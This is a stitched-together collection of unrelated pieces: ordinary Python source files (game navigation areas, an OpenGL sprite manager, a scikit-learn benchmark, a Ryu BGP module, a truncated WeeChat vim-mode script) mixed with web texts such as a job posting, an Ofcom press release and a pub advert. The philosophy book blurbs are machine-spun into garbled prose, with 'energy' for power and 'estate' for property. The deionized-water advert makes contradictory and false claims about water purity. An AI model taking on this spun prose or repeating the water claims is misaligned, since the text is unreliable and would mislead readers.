from util.rectangle import Rectangle class Area(object): """ A navigation area. This describes a rectangle in which movement is freely possible. Connections to other navigation areas allow pathfinding throughout a map. """ __slots__ = ( 'rect', 'z', 'sector', 'flags', 'plane', 'connections', 'elements', 'inside_rect', 'index', 'path', 'visited' ) # Sides of a navigation area. SIDE_TOP = 0 SIDE_RIGHT = 1 SIDE_BOTTOM = 2 SIDE_LEFT = 3 SIDE_RANGE = [SIDE_TOP, SIDE_RIGHT, SIDE_BOTTOM, SIDE_LEFT] SIDE_RANGE_OPPOSITE = [SIDE_BOTTOM, SIDE_LEFT, SIDE_TOP, SIDE_RIGHT] def __init__(self, x1, y1, x2, y2, z): # Position and size. self.rect = Rectangle(x1, y1, x2, y2) # Average Z location of this area. If the area has a slope, this # should not be used. self.z = z # Can refer to a sector index to which this navigation area is linked. If the # sector's floor or ceiling moves, this area will need to be updated along with it. self.sector = None # Flags, taken from a NavElement object. self.flags = 0 # A plane describing the surface of this area. self.plane = None # Connection objects leading into other navigation areas. self.connections = [] # For internal use, to track elements belonging to this area. self.elements = [] self.inside_rect = Rectangle() self.index = -1 self.path = False self.visited = False def get_side(self, side): """ Returns the start and end coordinates of a side of this area. """ if side == Area.SIDE_TOP: return self.rect.left, self.rect.top, self.rect.right, self.rect.top elif side == Area.SIDE_RIGHT: return self.rect.right, self.rect.top, self.rect.right, self.rect.bottom elif side == Area.SIDE_BOTTOM: return self.rect.left, self.rect.bottom, self.rect.right, self.rect.bottom elif side == Area.SIDE_LEFT: return self.rect.left, self.rect.top, self.rect.left, self.rect.bottom return None def __repr__(self): return 'area {}, z {}, sector {}, width {}, height {}, plane {}, flags {}, connections {}'.format(self.rect, self.z, self.sector, self.rect.get_width(), self.rect.get_height(), self.plane, self.flags, len(self.connections))
Morgenthau seeks to strengthen a accomplished idea of overseas politics, which he phrases political realism. not like idealism (which assumes the “essential goodness and endless malleability of human nature and the power of politics to dwell as much as ethical standards), realism assumes that the realm consists of opposing pursuits and clash between them is inevitable. Realism is essentially desirous about energy instead of morality or fabric pursuits. Morgenthau comprises robust assumptions approximately human nature – people usually are not evidently stable and clash is the traditional consequence of the hunt for strength, no longer of confusion. The impact of Aristotle, the prince of philosophers, at the highbrow heritage of the West is moment to none. during this e-book, Jonathan Barnes examines Aristotle's medical researches, his discoveries in good judgment and his metaphysical theories, his paintings in psychology and in ethics and politics, and his principles approximately paintings and poetry, putting his teachings of their historic context. In a capitalist economic climate, taxes are crucial device during which the political procedure places into perform a notion of monetary and distributive justice. Taxes arouse robust passions, fueled not just by means of conflicts of financial self-interest, yet by way of conflicting rules of equity. Taking as a tenet the traditional nature of personal estate, Murphy and Nagel exhibit how taxes can in basic terms be evaluated as a part of the final process of estate rights that they assist to create. The Philosophy of Sociality examines the character of sociality in its quite a few kinds, with targeted emphasis on collective intentionality. Raimo Tuomela starts off with a contrast among the "we-perspective" and the "I-perspective. " His examine of robust collective intentionality -- as expressed by way of joint intentions, collective dedication, team trust, authority-based staff motion, and different phenomena -- outlines the situations lower than which someone is needed to imagine and act as a gaggle member. This selection of essays by way of one of many country's prime estate theorists revitalizes the liberal character thought of estate. Departing from conventional libertarian and financial theories of estate, Margaret Jane Radin argues that the legislations may still keep in mind nonmonetary own worth connected to property—and that a few issues, reminiscent of physically integrity, are so own they need to no longer be thought of estate in any respect.
""" The MIT License (MIT) Copyright (c) 2015 Guillermo Romero Franco (AKA Gato) Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from glcompat import * from profiler import profile import numpy as N import math import libs.transformations as T from gltools import * #from OpenGL.arrays import vbo from libs.sortedcontainers.sortedlist import SortedList _floats_per_vertex = 6 class SpriteTexture: def __init__(self, surface_size): self._surface = pygame.Surface((surface_size,surface_size), flags=pygame.SRCALPHA) self._texture = Texture(smoothing=True) self._texture.setFromSurface(self._surface) self._vbo_change_low = 1000000 self._vbo_change_high = 0 self.reset() def getSurface(self): return self._surface # note vbo_index is the GLOBAL TILE NUMBER # that is, not numbered within the texture def setTainted(self, img = False, vbo_index=None): if img: self._img_tainted = True if vbo_index is not None: self._vbo_change_low = min(self._vbo_change_low, vbo_index) self._vbo_change_high = max(self._vbo_change_high, vbo_index+1) def reset(self): self._img_tainted = False self._vbo_change_low = 1000000 self._vbo_change_high = 0 def isImageTainted(self): return self._img_tainted def isVboTainted(self): t = self._vbo_change_high > self._vbo_change_low return t def updateGlTexture(self): if self._img_tainted: self._texture.update(self._surface) self._img_tainted = False def bind(self, loc): return self._texture.bind(0,loc) class SpriteManager: def __init__(self, tile_size=64): self._tile_size = tile_size self._texture_size = 1024 self._max_textures = 5 self._tile_rows_in_texture = self._texture_size / tile_size self._free_tiles = SortedList() self._textures = [] self._total_tiles = 0 self._sprites = {} self._top_sprite_id = 0 self._total_tiles_per_texture = int(self._tile_rows_in_texture**2) self._vbo_index_bytes_per_texture = self._total_tiles_per_texture * 6 * _floats_per_vertex * ctypes.sizeof(ctypes.c_uint16) self._max_tiles = self._total_tiles_per_texture *self._max_textures self.initBuffers() def initBuffers(self): self._vao = glGenVertexArray() glBindVertexArray(self._vao) self._shader = R.getShaderProgram("sprites") self._texture_loc = self._shader.getUniformPos("texture0") # 1 vectors of 3 for vertex coords # 1 vector of 2 for texture coords # 1 float for alpha # = 6 floats = _floats_per_vertex # x 4 points per quad self._data = N.zeros((self._max_tiles * 4, _floats_per_vertex),dtype="f") # 6 indices (2 tris) per quad indices = N.empty((self._max_tiles,6), dtype=N.uint16) j = 0 for i in xrange(self._max_tiles): ind = indices[i,:] ind[0] = j+0 ind[1] = j+1 ind[2] = j+2 ind[3] = j+0 ind[4] = j+2 ind[5] = j+3 j+=4; self._vertices_vbo = vbo.VBO(self._data.ravel(),usage=GL_DYNAMIC_DRAW) self._vertices_vbo.bind() stride = fsize * _floats_per_vertex glEnableVertexAttribArray(self._shader.attr_position) glVertexAttribPointer(self._shader.attr_position, 3, GL_FLOAT, False, stride, None) glEnableVertexAttribArray(self._shader.attr_tc) glVertexAttribPointer(self._shader.attr_tc, 2, GL_FLOAT, False, stride, ctypes.c_void_p(3 * fsize)) self._shader.getAttribPos("alpha",True) glEnableVertexAttribArray(self._shader.attr_alpha) glVertexAttribPointer(self._shader.attr_alpha, 1, GL_FLOAT, False, stride, ctypes.c_void_p(5*fsize)) self._indices_vbo = vbo.VBO(indices.ravel(), target=GL_ELEMENT_ARRAY_BUFFER,usage=GL_STATIC_DRAW) self._indices_vbo.bind() glBindVertexArray(0) # creates a new texture and pushes all new tiles # into the _free_tiles list def newTexture(self): texture_surface_id = len(self._textures) texture = SpriteTexture(self._texture_size) self._textures.append(texture) #[texture_surf, texture,False,0,0]) ty = 0 for y in xrange(self._tile_rows_in_texture): tx = 0 for x in xrange(self._tile_rows_in_texture): # #cols = #rows self._free_tiles.add((texture_surface_id, (ty,tx), self._total_tiles)) tx += self._tile_size self._total_tiles += 1 ty += self._tile_size def getFreeTile(self): try: tile = self._free_tiles.pop(0) except: self.newTexture() # create more tiles tile = self._free_tiles.pop(0) return tile def setTileAlpha(self, tile, alpha): texture_surf_id, tile_pos, tile_num = tile d = self._data[4*tile_num:4*tile_num+4] d[0:4,5] = alpha self._textures[texture_surf_id].setTainted(vbo_index=tile_num) def setTileGraphics(self, tile, src_tile_coord, surf, alpha): texture_surf_id, (ty,tx), tile_num = tile src_x = src_tile_coord[0] * self._tile_size src_y = src_tile_coord[1] * self._tile_size ts = self._tile_size # blit texture onto it tex = self._textures[texture_surf_id] texture_surf = tex.getSurface()# texture surface texture_surf.fill((0,0,0,0), rect=(tx,ty,ts,ts) ) texture_surf.blit(surf, (tx,ty), area=(src_x,src_y,ts,ts)) # setup the vbo data u0 = float(tx) / self._texture_size u1 = float(tx+ts) / self._texture_size v0 = 1.0-float(ty) / self._texture_size v1 = 1.0-float(ty+ts) / self._texture_size d = self._data[4*tile_num:4*tile_num+4] d[0][3:6] = (u0,v0, alpha) d[1][3:6] = (u0,v1, alpha) d[2][3:6] = (u1,v1, alpha) d[3][3:6] = (u1,v0, alpha) tex.setTainted(img=True, vbo_index=tile_num) def setTileTransform(self, tile, src_tile_coord, transform_info): texture_surf_id, tile_pos, tile_num = tile dx,dy,p0,px,py = transform_info x0 = dx * src_tile_coord[0] y0 = dy * src_tile_coord[1] d = self._data[4*tile_num:4*tile_num+4] vx = px - p0 vy = py - p0 p0 = p0 + vx*x0 + vy*y0 d[0][0:3] = p0 d[1][0:3] = p0 + vy * dy d[2][0:3] = p0 + vx * dx + vy * dy d[3][0:3] = p0 + vx * dx self._textures[texture_surf_id].setTainted(vbo_index=tile_num) def getTransformInfo(self, surf_w, surf_h, xform,centered): ts = self._tile_size tiles_w = int(math.ceil(float(surf_w)/ts)) tiles_h = int(math.ceil(float(surf_h)/ts)) p0 = N.array((0,0,0),dtype="f") px = N.array((surf_w,0,0),dtype="f") py = N.array((0,surf_h,0),dtype="f") if centered is not None: dp = N.array((surf_w*0.5,surf_h*0.5,0),dtype="f") p0 -= dp px -= dp py -= dp if xform is not None: xr = xform[0:3,0:3] xt = xform[0:3,3] p0 = N.dot(xr,p0)+xt px = N.dot(xr,px)+xt py = N.dot(xr,py)+xt dx = 1.0/tiles_w dy = 1.0/tiles_h return dx,dy,p0,px,py def _newSpriteHlp(self, surface, alpha, xform=None, centered=None): try: surface.get_width() except: surface = R.loadSurface(surface) ts = self._tile_size w,h = surface.get_width(), surface.get_height() tiles_x = int(math.ceil(float(w)/ts)) tiles_y = int(math.ceil(float(h)/ts)) transform_info = self.getTransformInfo(w,h,xform,centered) sprite_tiles = [] for y in xrange(tiles_y): for x in xrange(tiles_x): tile = self.getFreeTile() self.setTileGraphics(tile, (x,y), surface, alpha ) self.setTileTransform(tile, (x,y), transform_info ) sprite_tiles.append(tile) return (sprite_tiles,(w,h),alpha,xform,centered) def newSprite(self, surface, alpha=1.0, xform=None, centered=None): try: surface.get_width() except: surface = R.loadSurface(surface,False) s = self._newSpriteHlp(surface, alpha, xform, centered) id = self._top_sprite_id self._sprites[id] = s self._top_sprite_id+=1 return id def destroySprite(self, sid): try: s = self._sprites[sid] except: return for tile in s[0]: # iterate over the tiles in the sprite self.setTileAlpha(tile, 0) # this disables the rendering of the sprite self._free_tiles.add(tile) del self._sprites[sid] def setSpriteAlpha(self, sid, alpha): try: s = self._sprites[sid] except: return if s[2] == alpha: return for tile in s[0]: # iterate over the tiles in the sprite self.setTileAlpha(tile, alpha) def setSpriteTransform(self, sid, xform, centered=None): try: s = self._sprites[sid] except: return tiles,(w,h),alpha,old_xform,old_centered = s if centered is None: centered = old_centered transform_info = self.getTransformInfo(w,h,xform,centered) ts = self._tile_size tiles_x = int(math.ceil(float(w)/ts)) tiles_y = int(math.ceil(float(h)/ts)) i = 0 for y in xrange(tiles_y): for x in xrange(tiles_x): self.setTileTransform(tiles[i], (x,y), transform_info ) i+=1 def setSpriteGraphics(self, sid, surface): try: s = self._sprites[sid] except: return sprite_tiles,(w,h),alpha,xform,centered = s for tile in sprite_tiles: # iterate over the tiles in the sprite self._free_tiles.add(tile) self.setTileAlpha(tile, 0) # this disables the rendering of the sprite s = self._newSpriteHlp(surface, alpha, xform, centered) self._sprites[sid] = s @profile def draw(self, scene): glEnable(GL_BLEND) glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA) glDisable(GL_DEPTH_TEST) self._shader.begin() scene.uploadMatrices(self._shader) glBindVertexArray(self._vao) ofs = 0 self._indices_vbo.bind() for t in self._textures: t.updateGlTexture() if t.isVboTainted(): fac = _floats_per_vertex * 4 * fsize # bytes/quad self._vertices_vbo.bind() glBufferSubData( GL_ARRAY_BUFFER, fac * t._vbo_change_low, fac * (t._vbo_change_high - t._vbo_change_low), self._data[t._vbo_change_low*4:].ravel().ctypes.data_as(ctypes.c_void_p) ) self._indices_vbo.bind() t.bind(self._texture_loc) glDrawElements(GL_TRIANGLES,self._total_tiles_per_texture*6, GL_UNSIGNED_SHORT, ctypes.c_void_p(ofs)) ofs += self._vbo_index_bytes_per_texture t.reset() glBindVertexArray(0) self._shader.end() glEnable(GL_DEPTH_TEST) glDisable(GL_BLEND)
Additionally, the Editorial Assistant / Copy Editor will attend Editorial Team Conference Calls to discuss the progress of the publication, suggest ideas for improvement, technology, and other innovations. Additional duties may be assigned as required. Familiarity with the peer-review editorial process of journals and strong writing skills for academic publications, with some APA writing style experience. Evidence of graduate training or professional development, with some expertise and knowledge in the context of positive health and well-being. Any experience serving as an active contributor to an academic/professional publication or publication outlet is a plus. Applicant should be familiar with the first edition of Chronicle of Advances in Positive Health and Well-Being, available at: http://www.ippanetwork.org/divisions/healthdivision/health-and-wellness-publication-1/ The second publication will be issued in the late winter / spring of 2019. The Editorial Assistant / Copy Editor should be able to make a time commitment of 2-4 hours a week for the approximately 3 month working period before the release of the second edition. Time requirements may increase in the weeks leading up to the publication deadline. To talk with someone about this available role, please email healthdiv@ippanetwork.org. Reviewers are needed for Commentaries (submitted commentaries on emerging topics of interest to positive psychology, or of commentaries on articles already published in the positive psychology literature) and for Clinical / Practice (submissions related to clinical practice or training). The editorial team is preparing for the second issue of the Chronicle of Advances in Positive Health and Well-being to be released in the late winter / spring of 2019. Commentaries Reviewer: Interested individuals should have experience and awareness of the positive psychology general literature and curiosity about what might be new or intriguing in the field. Clinical / Practice Reviewer: Interested individuals must have clinical and/or practitioner experience (hands-on patient or client experience helpful, for example, MDs, DOs, PAs, NPs, and Nurses invited) relevant to positive psychology. Having publications in peer–reviewed journals using APA publication format is a plus.
""" Benchmarks for sampling without replacement of integer. """ from __future__ import division from __future__ import print_function import gc import sys import optparse from datetime import datetime import operator import matplotlib.pyplot as plt import numpy as np import random from sklearn.externals.six.moves import xrange from sklearn.utils.random import sample_without_replacement def compute_time(t_start, delta): mu_second = 0.0 + 10 ** 6 # number of microseconds in a second return delta.seconds + delta.microseconds / mu_second def bench_sample(sampling, n_population, n_samples): gc.collect() # start time t_start = datetime.now() sampling(n_population, n_samples) delta = (datetime.now() - t_start) # stop time time = compute_time(t_start, delta) return time if __name__ == "__main__": ########################################################################### # Option parser ########################################################################### op = optparse.OptionParser() op.add_option("--n-times", dest="n_times", default=5, type=int, help="Benchmark results are average over n_times experiments") op.add_option("--n-population", dest="n_population", default=100000, type=int, help="Size of the population to sample from.") op.add_option("--n-step", dest="n_steps", default=5, type=int, help="Number of step interval between 0 and n_population.") default_algorithms = "custom-tracking-selection,custom-auto," \ "custom-reservoir-sampling,custom-pool,"\ "python-core-sample,numpy-permutation" op.add_option("--algorithm", dest="selected_algorithm", default=default_algorithms, type=str, help="Comma-separated list of transformer to benchmark. " "Default: %default. \nAvailable: %default") # op.add_option("--random-seed", # dest="random_seed", default=13, type=int, # help="Seed used by the random number generators.") (opts, args) = op.parse_args() if len(args) > 0: op.error("this script takes no arguments.") sys.exit(1) selected_algorithm = opts.selected_algorithm.split(',') for key in selected_algorithm: if key not in default_algorithms.split(','): raise ValueError("Unknown sampling algorithm \"%s\" not in (%s)." % (key, default_algorithms)) ########################################################################### # List sampling algorithm ########################################################################### # We assume that sampling algorithm has the following signature: # sample(n_population, n_sample) # sampling_algorithm = {} ########################################################################### # Set Python core input sampling_algorithm["python-core-sample"] = \ lambda n_population, n_sample: \ random.sample(xrange(n_population), n_sample) ########################################################################### # Set custom automatic method selection sampling_algorithm["custom-auto"] = \ lambda n_population, n_samples, random_state=None: \ sample_without_replacement(n_population, n_samples, method="auto", random_state=random_state) ########################################################################### # Set custom tracking based method sampling_algorithm["custom-tracking-selection"] = \ lambda n_population, n_samples, random_state=None: \ sample_without_replacement(n_population, n_samples, method="tracking_selection", random_state=random_state) ########################################################################### # Set custom reservoir based method sampling_algorithm["custom-reservoir-sampling"] = \ lambda n_population, n_samples, random_state=None: \ sample_without_replacement(n_population, n_samples, method="reservoir_sampling", random_state=random_state) ########################################################################### # Set custom reservoir based method sampling_algorithm["custom-pool"] = \ lambda n_population, n_samples, random_state=None: \ sample_without_replacement(n_population, n_samples, method="pool", random_state=random_state) ########################################################################### # Numpy permutation based sampling_algorithm["numpy-permutation"] = \ lambda n_population, n_sample: \ np.random.permutation(n_population)[:n_sample] ########################################################################### # Remove unspecified algorithm sampling_algorithm = dict((key, value) for key, value in sampling_algorithm.items() if key in selected_algorithm) ########################################################################### # Perform benchmark ########################################################################### time = {} n_samples = np.linspace(start=0, stop=opts.n_population, num=opts.n_steps).astype(np.int) ratio = n_samples / opts.n_population print('Benchmarks') print("===========================") for name in sorted(sampling_algorithm): print("Perform benchmarks for %s..." % name, end="") time[name] = np.zeros(shape=(opts.n_steps, opts.n_times)) for step in xrange(opts.n_steps): for it in xrange(opts.n_times): time[name][step, it] = bench_sample(sampling_algorithm[name], opts.n_population, n_samples[step]) print("done") print("Averaging results...", end="") for name in sampling_algorithm: time[name] = np.mean(time[name], axis=1) print("done\n") # Print results ########################################################################### print("Script arguments") print("===========================") arguments = vars(opts) print("%s \t | %s " % ("Arguments".ljust(16), "Value".center(12),)) print(25 * "-" + ("|" + "-" * 14) * 1) for key, value in arguments.items(): print("%s \t | %s " % (str(key).ljust(16), str(value).strip().center(12))) print("") print("Sampling algorithm performance:") print("===============================") print("Results are averaged over %s repetition(s)." % opts.n_times) print("") fig = plt.figure('scikit-learn sample w/o replacement benchmark results') plt.title("n_population = %s, n_times = %s" % (opts.n_population, opts.n_times)) ax = fig.add_subplot(111) for name in sampling_algorithm: ax.plot(ratio, time[name], label=name) ax.set_xlabel('ratio of n_sample / n_population') ax.set_ylabel('Time (s)') ax.legend() # Sort legend labels handles, labels = ax.get_legend_handles_labels() hl = sorted(zip(handles, labels), key=operator.itemgetter(1)) handles2, labels2 = zip(*hl) ax.legend(handles2, labels2, loc=0) plt.show()
The Bell is a 15th Century Inn located in Whitchurch, Hampshire with a welcoming atmosphere. For the 7th year running, Jan and Paul are proud to announce that the Bell pub has been included yet again in the 2015 Camra good beer guide! We've got a good selection of real ales on tap - from Gales Seafarers Ale, Sharp's Doom Bar and London Pride.
import os from sys import modules from shutil import copytree def copy_examples(dest_path='.'): """Copy mfoutparser example files to a specified directory. Input: destination path for mfoutparser example files, default directory is the current path. If the destination directory exists and is not empty, then a directory called "examples" will be created for the files inside the destination directory. Output: directory with example files """ # Setup examples path mfoutpath = modules['mfoutparser'].__path__[0] examplespath = os.sep.join([mfoutpath, 'examples']) # Setup destination path if dest_path is '.': dest_path = os.getcwd() elif dest_path[0] is not os.sep: dest_path = os.sep.join([os.getcwd(), dest_path]) destination = dest_path # Create a new destination directory if current one is not empty if os.path.exists(destination): if os.listdir(destination) != []: destination = os.sep.join([destination, 'examples']) # Copy files try: copytree(examplespath, destination) except: print('Files could not be copied to {:s}'.format(destination)) else: print('Example files copied to {:s}'.format(destination)) return
Note: The landline results in this press release were adjusted on 15 December 2017 and the associated reports have been amended accordingly. Ofcom today published data on the volume of consumer complaints it has received against the major providers of telecoms and pay TV services. The latest report covers the three-month period from October to December 2016 (Q4), and includes complaints made about providers of landline telephone, home broadband, pay-monthly mobile and pay-TV services. Complaints figures are presented per 100,000 customers. By publishing complaints data, Ofcom aims to give people who are looking for a new provider useful information for comparing companies' performance. The quarterly reports also offer an incentive to providers to improve their performance. The total number of complaints made to Ofcom increased between Q3 2016 and Q4 2016. Broadband and landline telephone services generated the highest volume of complaints. Lindsey Fussell, Ofcom's Consumer Group Director, said: “Providers must get on and deliver consistently excellent customer service, and we expect this to be their number one priority.
""" This module provides a set of utilities for writing TSV files. .. autoclass:: mysqltsv.writer.Writer :members: .. autofunction:: mysqltsv.functions.write """ import logging from .util import write_row logger = logging.getLogger(__name__) class Writer: """ Constructs a new TSV row writer. :Parameters: f : `file` A file pointer to write rows to headers : `list`(`str`) If a list of `str` is provided, use those strings as headers. Otherwise, no headers are written. none_string : `str` A string that will be written as None when read. (Defaults to "NULL") """ def __init__(self, f, headers=None, none_string="NULL"): self.f = f self.none_string = none_string if headers != None: write_row(headers, self.f, none_string=self.none_string) self.headers = headers def write(self, row): """ Writes a row to the output file. :Parameters: row : `list` | `dict` | :class:`~mysqltsv.row_type.AbstractRow` Datastructure representing the row to write """ write_row(row, self.f, headers=self.headers, none_string=self.none_string)
Figures released by ITS (UK) member Transport Scotland show that almost every single driver on a 51-mile stretch (80 km) of the A90 travelled within the speed limit in 2018. The road is enforced by fellow ITS (UK) member Jenoptik’s average speed cameras which monitor the journey time between locations and flag up those completing sections of journeys in time that they could only have done if they were speeding. The figures show that in the 12 months of operation, 5,942 drivers were caught breaking the limit and were issued with a fine and penalty points, however this was out of an estimated 8.4 million journeys in each direction meaning Conditional Offers Fixed Penalty Notices made up just 0.07% of journeys.
# Copyright (C) 2014 Nippon Telegraph and Telephone Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. """ Defines data types and models required specifically for VPNv4 support. """ import logging from ryu.lib.packet.bgp import IPAddrPrefix from ryu.lib.packet.bgp import RF_IPv4_VPN from ryu.services.protocols.bgp.info_base.vpn import VpnDest from ryu.services.protocols.bgp.info_base.vpn import VpnPath from ryu.services.protocols.bgp.info_base.vpn import VpnTable LOG = logging.getLogger('bgpspeaker.info_base.vpnv4') class Vpnv4Dest(VpnDest): """VPNv4 Destination Store IPv4 Paths. """ ROUTE_FAMILY = RF_IPv4_VPN class Vpnv4Table(VpnTable): """Global table to store VPNv4 routing information. Uses `Vpnv4Dest` to store destination information for each known vpnv4 paths. """ ROUTE_FAMILY = RF_IPv4_VPN VPN_DEST_CLASS = Vpnv4Dest class Vpnv4Path(VpnPath): """Represents a way of reaching an VPNv4 destination.""" ROUTE_FAMILY = RF_IPv4_VPN VRF_PATH_CLASS = None # defined in init - anti cyclic import hack NLRI_CLASS = IPAddrPrefix def __init__(self, *args, **kwargs): super(Vpnv4Path, self).__init__(*args, **kwargs) from ryu.services.protocols.bgp.info_base.vrf4 import Vrf4Path self.VRF_PATH_CLASS = Vrf4Path
Compare Deionized Water. Huge Spring Sales Now On! Hopping Mad Deals Ending Soon, Take Advantage Now! You can compare the deionized water vs distilled water, but to say that the distilled water is the same as deionized water is a mistake. The terms “distilled water” and “deionized water” are often misunderstood. Deionization of water involves mixing whereas distilled water simply involves the evaporation and re-condensation of water. Deionized water Vs. Distilled water . Summary of Deionized water Vs. Distilled water. Distilled water is water that has been evaporated through boiling and the re-condensed in a separate container. Depending on the source water, distilled water can be more pure than deionized water – but that doesn't necessarily mean that it's better. There are pros and cons to using deionized water vs. distilled water for particular processes, particularly when it comes to cost and efficiency. Which water should you use in your cosmetic lab? When we take all factors into account, distilled water has the highest quality for a cosmetic lab but distilled water is not always achievable and affordable. As an alternative, you can use deionized or RO water in your cosmetic lab. Best practise is to use freshly boiled water in your cosmetic lab. Distilled water is the most common kind of purified water and may often be confused with deionized water, but the two are certainly different. Distilled water and deionized water are both fit to drink, but deionized water is more pure. Distilled water conducts electricity whereas deionized water does not.
# -*- coding: utf-8 -*- # # Copyright (C) 2013-2014 Germain Z. <germanosz@gmail.com> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # # Add vi/vim-like modes to WeeChat. # import csv import os import re import subprocess from StringIO import StringIO import time import weechat # Script info. # ============ SCRIPT_NAME = "vimode" SCRIPT_AUTHOR = "GermainZ <germanosz@gmail.com>" SCRIPT_VERSION = "0.5" SCRIPT_LICENSE = "GPL3" SCRIPT_DESC = ("Add vi/vim-like modes and keybindings to WeeChat.") # Global variables. # ================= # General. # -------- # Halp! Halp! Halp! GITHUB_BASE = "https://github.com/GermainZ/weechat-vimode/blob/master/" README_URL = GITHUB_BASE + "README.md" FAQ_KEYBINDINGS = GITHUB_BASE + "FAQ#problematic-key-bindings.md" FAQ_ESC = GITHUB_BASE + "FAQ.md#esc-key-not-being-detected-instantly" # Holds the text of the command-line mode (currently only Ex commands ":"). cmd_text = "" # Mode we're in. One of INSERT, NORMAL or REPLACE. mode = "INSERT" # Holds normal commands (e.g. "dd"). vi_buffer = "" # See `cb_key_combo_default()`. esc_pressed = 0 # See `cb_key_pressed()`. last_signal_time = 0 # See `start_catching_keys()` for more info. catching_keys_data = {'amount': 0} # Used for ; and , to store the last f/F/t/T motion. last_search_motion = {'motion': None, 'data': None} # Script options. vimode_settings = {'no_warn': ("off", "don't warn about problematic" "keybindings and tmux/screen")} # Regex patterns. # --------------- WHITESPACE = re.compile(r"\s") IS_KEYWORD = re.compile(r"[a-zA-Z0-9_@À-ÿ]") REGEX_MOTION_LOWERCASE_W = re.compile(r"\b\S|(?<=\s)\S") REGEX_MOTION_UPPERCASE_W = re.compile(r"(?<=\s)\S") REGEX_MOTION_UPPERCASE_E = re.compile(r"\S(?!\S)") REGEX_MOTION_UPPERCASE_B = REGEX_MOTION_UPPERCASE_E REGEX_MOTION_G_UPPERCASE_E = REGEX_MOTION_UPPERCASE_W REGEX_MOTION_CARRET = re.compile(r"\S") REGEX_INT = r"[0-9]" # Regex used to detect problematic keybindings. # For example: meta-wmeta-s is bound by default to ``/window swap``. # If the user pressed Esc-w, WeeChat will detect it as meta-w and will not # send any signal to `cb_key_combo_default()` just yet, since it's the # beginning of a known key combo. # Instead, `cb_key_combo_default()` will receive the Esc-ws signal, which # becomes "ws" after removing the Esc part, and won't know how to handle it. REGEX_PROBLEMATIC_KEYBINDINGS = re.compile(r"meta-\w(meta|ctrl)") # Vi commands. # ------------ # See Also: `cb_exec_cmd()`. VI_COMMANDS = {'h': "/help", 'qall': "/exit", 'q': "/close", 'w': "/save", 'set': "/set", 'bp': "/buffer -1", 'bn': "/buffer +1", 'bd': "/close", 'b#': "/input jump_last_buffer_displayed", 'b': "/buffer", 'sp': "/window splith", 'vsp': "/window splitv"} # Vi operators. # ------------- # Each operator must have a corresponding function, called "operator_X" where # X is the operator. For example: `operator_c()`. VI_OPERATORS = ["c", "d", "y"] # Vi motions. # ----------- # Vi motions. Each motion must have a corresponding function, called # "motion_X" where X is the motion (e.g. `motion_w()`). # See Also: `SPECIAL_CHARS`. VI_MOTIONS = ["w", "e", "b", "^", "$", "h", "l", "W", "E", "B", "f", "F", "t", "T", "ge", "gE", "0"] # Special characters for motions. The corresponding function's name is # converted before calling. For example, "^" will call `motion_carret` instead # of `motion_^` (which isn't allowed because of illegal characters). SPECIAL_CHARS = {'^': "carret", '$': "dollar"} # Methods for vi operators, motions and key bindings. # =================================================== # Documented base examples: # ------------------------- def operator_base(buf, input_line, pos1, pos2, overwrite): """Operator method example. Args: buf (str): pointer to the current WeeChat buffer. input_line (str): the content of the input line. pos1 (int): the starting position of the motion. pos2 (int): the ending position of the motion. overwrite (bool, optional): whether the character at the cursor's new position should be overwritten or not (for inclusive motions). Defaults to False. Notes: Should be called "operator_X", where X is the operator, and defined in `VI_OPERATORS`. Must perform actions (e.g. modifying the input line) on its own, using the WeeChat API. See Also: For additional examples, see `operator_d()` and `operator_y()`. """ # Get start and end positions. start = min(pos1, pos2) end = max(pos1, pos2) # Print the text the operator should go over. weechat.prnt("", "Selection: %s" % input_line[start:end]) def motion_base(input_line, cur, count): """Motion method example. Args: input_line (str): the content of the input line. cur (int): the position of the cursor. count (int): the amount of times to multiply or iterate the action. Returns: A tuple containing three values: int: the new position of the cursor. bool: True if the motion is inclusive, False otherwise. bool: True if the motion is catching, False otherwise. See `start_catching_keys()` for more info on catching motions. Notes: Should be called "motion_X", where X is the motion, and defined in `VI_MOTIONS`. Must not modify the input line directly. See Also: For additional examples, see `motion_w()` (normal motion) and `motion_f()` (catching motion). """ # Find (relative to cur) position of next number. pos = get_pos(input_line, REGEX_INT, cur, True, count) # Return the new (absolute) cursor position. # This motion is exclusive, so overwrite is False. return cur + pos, False def key_base(buf, input_line, cur, count): """Key method example. Args: buf (str): pointer to the current WeeChat buffer. input_line (str): the content of the input line. cur (int): the position of the cursor. count (int): the amount of times to multiply or iterate the action. Notes: Should be called `key_X`, where X represents the key(s), and defined in `VI_KEYS`. Must perform actions on its own (using the WeeChat API). See Also: For additional examples, see `key_a()` (normal key) and `key_r()` (catching key). """ # Key was pressed. Go to Insert mode (similar to "i"). set_mode("INSERT") # Operators: # ---------- def operator_d(buf, input_line, pos1, pos2, overwrite=False): """Delete text from `pos1` to `pos2` from the input line. If `overwrite` is set to True, the character at the cursor's new position is removed as well (the 